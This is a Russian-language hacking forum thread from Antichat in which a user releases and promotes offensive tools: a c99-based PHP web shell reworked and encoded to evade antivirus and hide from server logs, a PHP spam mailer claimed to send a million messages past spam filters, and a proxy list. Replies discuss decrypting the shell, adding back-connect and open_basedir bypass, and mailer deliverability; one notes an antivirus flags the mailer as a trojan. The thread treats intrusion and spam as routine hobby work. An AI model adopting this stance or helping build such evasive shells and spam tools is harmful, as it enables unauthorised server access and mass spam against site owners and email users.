ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Избранное (https://forum.antichat.io/forumdisplay.php?f=89)
-   -   Релизы от madnet (https://forum.antichat.io/showthread.php?t=21945)

madnet 09.04.2006 15:43

Релизы от madnet
 
Итак, прошу прощение за то, что в последнее время, вроде как, ничего нового от меня не поступало.
Наверстываю упущенное:


1) Список проксей
Наконец-то доработал скрипт сбора проксей.
Каждый час берет публичные прокси из 3х источников, проверяет валидность, скорость соединение, страну и т.д. Старые удаляет, а свежие сохраняет в БД, так что кому на быструю руку нужны соксы, милости прошу
http://madnet.name/tools/proxy/

2) VIDEO
Повышение прав, используя MySQL
Скорее я его писал для тренировки в обработке видео, но тем не менее.
Никак не могу выловить Zadoxik'а, поэтому надеюсь, он закинет видео отсюда
Качаем, смотри, наслаждаемся
http://madnet.name/files/3/14.html 1.7mb
Старенькое видео об xss в set-cms
http://madnet.name/files/3/13.html 2mb

3) с99madshell
Наверное, самый приятный релиз.
Какой шелл вы юзаете?
r57shell? потому что он гоняет все в посте?
Так ведь он очень неудобен, да и в последних версиях он все больше использует гет+баннеры+графика, в общем, ужас.
Из всего многообразия я для себя подобрал c99shell.
Что бы кто ни говорил он самый удобный, но есть много недочетов.

a) Картинки, запустите скрипт с включенной графикой в браузере, и вы подарили админу в лог минимум 100 строчек запросов.
b) Антивирусы, шеллы не должны палиться антивирусниками
c) Размер, 162кб для шелла, это согласитесь перебор.
d) GET, просто самый огромный недостаток, все данные посылаются method=GET

Итак, после некоторых мучений представляю полностью переделанный шелл.
a) Никакой лишней графики
b) Скрипт полностью переписан+тело закодировано, так что забудем про антивирусы
c) Удалено все лишнее+сжат, размер теперь 44кб сделал все что смог
в) Никакого GET, абсолютно все запросы гоняются методом POST, что позволит сделать наш шелл в системе слабо заметным.
Качаем отсюда
http://madnet.name/files/1/10.html

4) TextForVideo
Небольшая програмка для записи видео. Суть ее в следующем вы пишете в ней свой коментарий, а потом по нажатию горячей клавиши она вписывает коментарий в блокнот. Для того что-бы соответствовать событиям я сделал построчное разбиение, т.е, на каждой новой строке проги вы записываете фразу, которая должна быть выведена за раз.
К примеру:
Привет меня завут madnet сегодня я... ищем жертву.
Будем работать с www.xxx.xxx

Далее мы нажимаем на кнопку Запустить редактор
Будет загружен Блокнот с вашим именем в качестве заголовка, которое вы выберете в поле Заголовок редактора
Потом сворачиваем программу, она исчезает в трей.
Теперь можно начинать запись.
Все что остается сделать это нажимать на HotKey, которую вы установите в настройке, по умолчанию F9

Нажимаем ее в блокноте печатается надпись
Привет меня завут madnet сегодня я... ищем жертву.
Теперь вы делаете че там вам надо ищете и т.д., нашли жмем снова HOTKEY блокнот автоматов выносится на первый план и в нем появляется
Будем работать с www.xxx.xxx
Ну и так далее по тексту.
http://madnet.name/files/2/12.html

5) Mailer
Не подумайте что я спамер, просто был заказ написать спам скрипт.

Вот мой spam скрипт,
написан на php,
работает через sendmail

Возможности:
Интеллектуальная рандомная генерация полей
Рассылка с аттачем
plane и html тип
работа как с формами так и с файлами
и т.д.

Чел тестил на tut.by и yahoo.com
разослал по 1 000 000 писем.
Письма не были определены как спам.
http://madnet.name/files/1/3.html

Обо всех недочетах или пожеланиях пишем здесь, в ПМ или ICQ.

Надеюсь, хоть что-то полезное вы здесь нашли для себя.

С уважением madnet.

Algol 10.04.2006 12:25

Мне понравился здесь список типов атак http://securityprobe.net/docs/2.html
Может выложить его на античате? Автор кто? Согласен?

madnet 10.04.2006 13:05

Algol, выкладывай, только в качестве автора укажи пожалуйста http://securityprobe.net

Algol 10.04.2006 13:42

Цитата:

Сообщение от madnet
Algol, выкладывай, только в качестве автора укажи пожалуйста http://securityprobe.net

Ок, только кое-что придется подредактировать, ибо я не со всем согласен в этой статье :)

Zitt 28.07.2006 02:11

madnet выложи гденить шелл в txt чтоб удобно юзать было. Типа как rst (http://rst.void.ru/download/r57shell.txt)

Sn@k3 29.07.2006 01:45

:) вот я за него сделал http://sec-hack.org/soft/madshell.txt

Elekt 21.08.2006 19:17

Вложений: 2
Специально для поклонников шелла Маднета!

С разрешения автора выкладываю два скрипта для распаковки\запаковки шелла, а также шелл в распакованном виде.

http://sec-123.narod.ru/shells/c99madnet/for_decript_c99.php
http://sec-123.narod.ru/shells/c99madnet/for_cript_c99.php
http://sec-123.narod.ru/shells/c99madnet/c99madshell_no_cript.zip


Теперь желающие смогут поправить его на свой вкус.
Например, изменить константу
Код:

$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
на свой сайт и грузить тулзы бэк-бинд-пайпа, которые не работают в оригинальном шелле.

Также, Вы можете изменить алгоритм шифрования, или изменить стандартные 11 сжатий на , скажем, 150 :)

Ах, вам не нравится шел Маднета? Вы уважаете шелл РСТ ?
Ну, чтож. Там принцип сжатия аналогичен, теперь вы сможете сконструировать свой рст-шел под себя, а затем распаковать и вырезать гадские счётчики! :)

karabym 02.02.2007 14:49

madnet

Твой шелл рулез однозначно!!!

Может с нуля забабацаешь шелл так сказать свой запатентованый :)

madnet 02.02.2007 15:45

Цитата:

Сообщение от karabym
madnet

Твой шелл рулез однозначно!!!

Может с нуля забабацаешь шелл так сказать свой запатентованый :)

нет в этом смысла, но возможно, если мне хватит сил и времени, вскоре появится что-то новенькое и интересное в этом направлении!

karabym 02.02.2007 15:55

Цитата:

вскоре появится что-то новенькое и интересное в этом направлении!
ОК юэсей :) будем ждать а ждать мы умеем :)

SQLHACK 03.04.2007 17:19

Вот пользовал я год с99. и понял имхо что бэк коннект и бинд должны быть всегда внутри шелла. это очень часто спасает, а увеличивает скрипт на 3кб.
и ещё очень бы хотелось запихать туда возможность обхода open_basedir.

и вообще я лично не понимаю нах бекконнект убирать из скрипта?
чтоб юзер потом сам скачал, раскодировал, доделывал, кодировал,?

это бл.. игра какая то новая такая ?
под названием "после сборки обточить напильником"

чесслово .Маразм

GlobaL 04.05.2007 08:59

Когда запускаю твою спамилку точнее просто открываею его на сайте вылазит во что
Код:

Cannot set time limit in safe mode in /home/global/domains/домен/public_html/files/madsp.php on line 8
Но прога роботает, пишет чьл разослано.

madnet 04.05.2007 11:27

Цитата:

Сообщение от GlobaL
Когда запускаю твою спамилку точнее просто открываею его на сайте вылазит во что
Код:

Cannot set time limit in safe mode in /home/global/domains/домен/public_html/files/madsp.php on line 8
Но прога роботает, пишет чьл разослано.


Для того, что бы скрипт работал столько, сколько нужно, надо что бы на сервере был выключен Safe mode

.Slip 10.09.2007 18:52

У тебя тут очепятка:
http://madnet.name/tools/madss/

Цитата:

Заперщено к индексированию:
:)

Knight_of_Darkness 17.09.2007 22:49

а зеркала есть? +есть несколько идей насчет доработки шелла, отпишу попозже

madnet 18.09.2007 12:23

Зеркал нет и пока не вижу никакой необходимости в них.

maximum 16.10.2007 19:06

Не качаеться!
Что то с сайтом, или это только у меня так?

madnet 23.10.2007 11:32

Доступ восстановлен.

Scipio 03.11.2007 07:22

мде... сейчас вот нужно было файлик один посмотреть, шелл залил, а посмотреть не смог, т.к. имя файла плюсенг содержит... это наверно с тех пор осталось, когда с99 с Гет запросами работал (ну всмысле менял плюсенг на %2b)... надо бы исправить

да и так недочеты есть, например файло сохраняет в туже папку где и шелл, а это имхо бывает критично, например залил я шелл через админку ну или еще как нить шелл залился а когда я его открываю, прав на запись (из шелла) в эту папку нет, а там еще и сейфмоде докучи... вобщем вот... а еще Sql клиент содержит недочеты

А в целом хорошо, сделано все через пост, картинок нет, которые нах ненужны были

вобщем если все доработать (ну там баги некторые устранить, тулзы типа бэкконект в шелл встроить, брутер опять же с обратными логинами сделать, можно еще и мускул брут сделать) хотя понимаю, что объять необъятное нельзя и всем неугодишь, буду только им пользоваться

1SeTh 04.11.2007 00:23

Madnet

Спасибо за спам скрипт.
Действительно письма не определяются как спам. Но вот беда тип html не работает. До адресата доходить теги в открытом виде.

Хозяин 10.12.2007 01:11

На досуге делаь было не чего )
Переделал диз мэйлера под диз а-чата (все копирайтенги соблюдены)

Вот пример:
http://kaitracid.awardspace.us/madsp.php

Сам скрипт:
http://slil.ru/25212510


Sadden, отлично шлется аштиэмэлом, все зависит от хоста с коорого ты шлешь.

guest3297 10.12.2007 06:16

Картинки глупо переносить расположение спамера можно спалить по логам...

Хозяин 10.12.2007 06:49

Из спаммера скрипт уже давно вырос, теперь это "усовершенствованная отправка анонимной почты", не больше. А для кого это инструмент спама, могут удалить легко первую таблицу "шапку", останется "серый" ачатовский дизайн.

alexman90 10.12.2007 10:42

Здравствуйте, мне интересно этот php спамер тока у меня не отсылает на маил.ру или у всех? (на другие почтовики не пробовал)
P.S. тестировал как и на своих хостигнах, так здесь: http://kaitracid.awardspace.us/madsp.php

Хозяин 10.12.2007 11:00

alexman90, http://kaitracid.awardspace.us/madsp.php - здесь он висит для демонстрации.

На мэйл ру прекрасно шлет, только с фри хостов врядли получится, большинство из них навно в блэк листе у мэйла.

К примеру с платного хоста jino все доходит, и в text и в html

alexman90 10.12.2007 11:08

Спасибо за информацию.... да странно что onepage.ru у них в блек листе....вроди как мало народу им пользуется...хотя это лучший из фрихостингов

Ar3s 10.12.2007 19:56

AciD_FreaK А скачать его где можно. перечитал все с самого начала. Сползал на сайт а ссылки не нашел. Может не туда смотрю?

Хозяин 10.12.2007 20:58

Так вот же он, переделанный

http://slil.ru/25212510
Оригинал в начале топа

1SeTh 11.12.2007 23:56

имхо глюк в самом скрипте, потому что у меня есть другие скрипты которые шлют с бесплатного хоста и в хтмл

Scipio 16.12.2007 17:48

Шелл, определяет символические ссылки как обычные файлы

indemeon 06.07.2010 21:02

http://madnet.name/files/1/3.html

а это чаго?(http://madnet.name/files/download/2_madspamer.php\{gzip}

PHP:Agent-M [Trj]

Троян

С Уважением,Avast

Soviet[HZ] 04.11.2011 21:18

Цитата:

Сообщение от Elekt
Специально для поклонников шелла Маднета!
С разрешения автора выкладываю два скрипта для распаковки\запаковки шелла, а также шелл в распакованном виде.
http://sec-123.narod.ru/shells/c99madnet/for_decript_c99.php

http://sec-123.narod.ru/shells/c99madnet/for_cript_c99.php

http://sec-123.narod.ru/shells/c99madnet/c99madshell_no_cript.zip


В атаче битые архивы, кое-что все таки вытянул, но декрипт никак не смог. Сайт Электа давно уже не работает. Кто нибудь перезалить может?

Bahamut 30.06.2012 16:23

перезалеите php mailеr

TaveL 05.12.2014 20:46

По старой памяти зашел на madnet.name - висит какой-то дор, домен похоже больше не оплачивают. Ведь был хороший проект, на нем был какой-то трафик. Никогда не понимал зачем выкидывать такие проекты. Судя по вебархиву, в 2013-м проект был еще жив. Жаль, good night, sweet prince...

winstrool 08.12.2014 19:40

Цитата:

Сообщение от TaveL
По старой памяти зашел на madnet.name - висит какой-то дор, домен похоже больше не оплачивают. Ведь был хороший проект, на нем был какой-то трафик. Никогда не понимал зачем выкидывать такие проекты. Судя по вебархиву, в 2013-м проект был еще жив. Жаль, good night, sweet prince...

проект и впрямь был хорош, но сам автор походу подзабил(((, думал куда то пропал но по активности периодически на ачате появляется, хз почему он забил(((

Alexandr II 08.12.2014 20:31

Цитата:

Сообщение от winstrool
проект и впрямь был хорош, но сам автор походу подзабил(((, думал куда то пропал но по активности периодически на ачате появляется, хз почему он забил(((

еще не известно, он ли появляется, или акк куплен кем то

если бы появлялся, то хотябы отписывал или дал понять всем причину закрытия его проекта

kcash 17.12.2014 18:09

Цитата:

Сообщение от raptor.f22
будет ли актуально сделать сервисы типа маднетовских?
точнее я уже ето делал. не удалят ли снова админы античата?

да .. я даже тебе могу подсказать с функциями какие будут востребованы и поделиться своими наработками

icq: 323980335


Время: 13:22